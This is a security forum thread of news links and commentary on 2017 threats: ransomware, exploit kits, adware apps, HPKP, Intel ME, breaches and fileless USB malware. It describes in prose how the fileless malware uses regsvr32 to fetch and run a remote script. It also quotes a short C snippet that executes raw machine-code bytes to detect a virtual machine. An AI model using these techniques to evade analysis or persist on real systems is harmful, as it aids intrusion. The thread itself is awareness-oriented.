New Malware Abuses PowerPoint Slide Show
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0199-new-malware-abuses-powerpoint-slide-show/
The Crisis of Connected Cars: When Vulnerabilities Affect the CAN Standard
http://blog.trendmicro.com/trendlabs-security-intelligence/connected-car-hack/
Hundreds of adware infested android-apps in Google Play,
one hundred or so of these adware-laden apps still were not been taken down by Google.
More and more the Google Chrome Android Mono-Culture is becoming a privacy and adware nightmare for end-users,
as the Google chrome browser mono-culture is becoming a likewise threat.
Less and less alternative paths open for those that want to evade these intrusions. 
:-[
Even firefox has thrown the towel to further the Google extension api everywhere.
More attack surface means less defense and bigger threats to the sheeple!!!
polonus
It’s baaaack: Locky ransomware is on the rise again
https://nakedsecurity.sophos.com/2017/08/17/its-baaaack-locky-ransomware-is-on-the-rise-again/
New Disdain Exploit Kit Detected in the Wild
http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/
Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-004
https://www.drupal.org/SA-CORE-2017-004
500 adridden apps removed by Google from the webstore:
http://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Read about the development: https://blog.lookout.com/igexin-malicious-sdk
Mainland China testbed for ad- and spyware for developers and surveillance alike.
Do not read here, as it comes ad-ridden by itslef, block link: htxp://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Link found in: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-social/hosts (uBlock O).
polonus
List of programs to stay away from or be specially cautious with,
because firm pays to compromise them through zero-days:
hxtps:%2F%2Fzerodium.com%2Fprogram.html&originalURL=973370001&pip=false&premium=false&client_uid=1241509284&client_ver=4.0.6.149&client_type=IEPlugin&suite=false&aff_id=662-187&locale=nl_nl&ui=1&os_ver=6.3.0.0
(link broken by me, as it could be risky for the non-savvy).
Firm is buying zero-days on chat-apps like Signal, WhatsApp, WeChat, Telegram, Facebook Messenger and Viber.
Amazing there are states in the world where such security-endangering trade of zero-days can be performed within legal bounds. :o
polonus
New EMPTY CryptoMix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/
Cannot it be made really and one-way secure? HTTP public key pinning, they giving up on HPKP:
Read on backgrounds:
https://www.theregister.co.uk/2017/08/25/hpkp_crypto_criticism/ (link author = John Leyden)
Because of the complexity and feared attacks like: https://scotthelme.co.uk/using-security-features-to-do-bad-things/
Trust chains must be unbroken, no certs should be issued in error ever, some to trust https://certificatechain.io/
and do not forget to check the code is correct. Cert should be in your DNSSEC authenticated DNS records.
It could come to it that we could also drop most of the root CAs from browsers
or at least devalue them to orange padlocks or something, until explicitly trusted. DANE will come coded into the browser
Chrome and firefox). Time to change to DNSSEC, but a lot of banks haven’t yet changed… (info source from comments to article)
pol
L.S.
Trying to get the 0-ring on chips sort of tinkerproof by disabling Intel Management Engine via a new method.
Probably the availability of this bit can only mean NSA requires a possibility to de-install this attack-vector to just use it for themselves. Also consider for instance the new byte by byte load- & tinkerproof Google Titan chip.
Intel and AMD are getting at your data big time, NSA as well as we know by now from the backdoors.
In this case NSA’s High Assurance Platform, a NSA trusted platform
(the bit found by researchers in the code was named “reserve_hap”)
One thinks it was designed to prevent so-called “side-leaks”.
OpenSSL now proven to be crappy and it took Heartbleed to become aware of the real insecure overall ‘borked’ situation.
So as the going is getting increasingly narrow by using undocumented unsupported features ,
there is need for open software alternatives, to see that resource engineering
is not exclusively meantfor big goverment and big business.
Intel AMT handling now looks weird, just AMT being abused to create a worm of sorts,
and WannaCry in comparison would have been a picknick.
Open source CPU, the Chinese will facilitate (but not in the Lenovo way please). Like this: https://www.forbes.com/sites/rogerkay/2015/03/20/openpower-unlocks-floodgates-for-an-all-chinese-server-business/
POWER9CPU does not cost that much, but the maiboard is very very expensive (because of the low minimal production volumes) 8)
Another name to mention in this context: http://www.lowrisc.org
polonus (volunteer website security analyst and website error-hunter)
I am subscribed to Have I been pwned? and have been notified of a huge email and possible password breach, including my Outlook account.
Breach info: https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
Have I been pwned? info: https://haveibeenpwned.com/
Update to Security Bulletin (APSB17-24)
https://blogs.adobe.com/psirt/?p=1484
Hi simion,
Would you check freely at https://haveibeenpwned.com/ ?
I remember the WOT web reputation user database sell-out tragedy.
What does the word TRUST still mean on the Interwebs to-day?
Should not we start to use UIN aliases?
polonus
“Roboto Condensed Font” social engineering attack targets firefox and chrome users:
Can be related to coinminer crypto-currency delving malware or to install Nymaim- & Ursniff-malware.
So do not fall for the malcode scam… 
polonus
Greetings pol:
Yes, certainly trust is a dwindling commodity on today’s internet. But you must trust someone, or why be on the net at all? To me, it is worth the risk of being registered at a site like Have I been pwned? and having my email possibly sold or stolen in a site database attack. My reward is being notified of account breaches which may include my email, password, real name, address and telephone number, Social Security or other personal government identification numbers. The trade-off is clearly worth it.
I’m not familiar with UIN Aliases, but I fear it might be another database to be lost, stolen, or compromised.
Regards,
Simion
Thank you, Simion, for your reaction.
I checked and fortunately all of my present mail accounts were/are secure.
Once we were affected from a hack here on the forums, and all were advised to change their account passwords.
An good old trick I learned from an oldtimer admin was to give in a wrong password first and come up with the appropriate one later.
There might be a phase however where we cannot go on any longer without two-phase-authorization.
Certainly education and following best server & client configuration and best practices would help,
but while you visit this site here, you are very well aware of the fact, that the securety status of the general infrastructure on the Interwebs is far below par.
Those that know how to fence for themselves are slowly becoming a small minority,
and that overall situation does not seem to worry the majority of common users and those parties, the situation at hand is suiting them well. >:(
A sorry situation really but we here cannot make the difference as anyone can 
Stay safe and secure both online as offline, is the wish of
polonus aka Damian (volunteer website security analyst and website error-hunter)
P.S. on UIN aliases: https://www.ltnow.com/using-aliases-in-gmail/
“Fileless” backdoor spreading through usb sticks:
http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/
and
http://blog.trendmicro.com/trendlabs-security-intelligence/usb-malware-implicated-fileless-attacks/
Payload does not go to disk but enters directly into memory.
Only few Anti-Malware tools can protect against such an attack taking effect.
While all say they are performing memory scans,
this only means they detect “KNOWN” malicious code in memory and not in a generic way.
Backdoors can now spread via shortcuts via USB sticks.
This procedure is mentioned “fileless”, because in the registry an entry is entered that calls regsrv32,
while an URL is added into Window’s scripting engine,
upon which that URL downloads a script and executes it.
So the computer does not have any "infested file. However every time at boot that same malware is being loaded.
As said not all AV is up to protecting against this form of malware (yet).
This also has certain implementations for Joanna Rutkowska’s idea of the stateless laptop: https://blog.invisiblethings.org/2015/12/23/state_harmful.html
She recently spoke about this on A Hanburg Security Conference. Re: https://github.com/rootkovska/state_harmful/blob/master/Makefile
Joanna Rutkowska’s red pill code
oanna Rutkowska's red pill code: int swallow_redpill () { unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3"; *((unsigned*)&rpill[3]) = (unsigned)m; ((void(*)())&rpill)(); return (m[5]>0xd0) ? 1 : 0; }meant for VM on Intel machines...
Backdoors like the JS_POWMET fileless malware were mainly detected to exist in the Asia and the Pacific theater.
polonus
Thanks, pol. Stay safe!
That Instagram hack is shaping up to be way bigger than anyone thought
http://mashable.com/2017/09/01/instagram-hack-regular-users/?utm_cid=hp-h-1#jEdk3_CXkPqz
http://www.thedailybeast.com/hackers-make-searchable-database-to-dox-instagram-celebs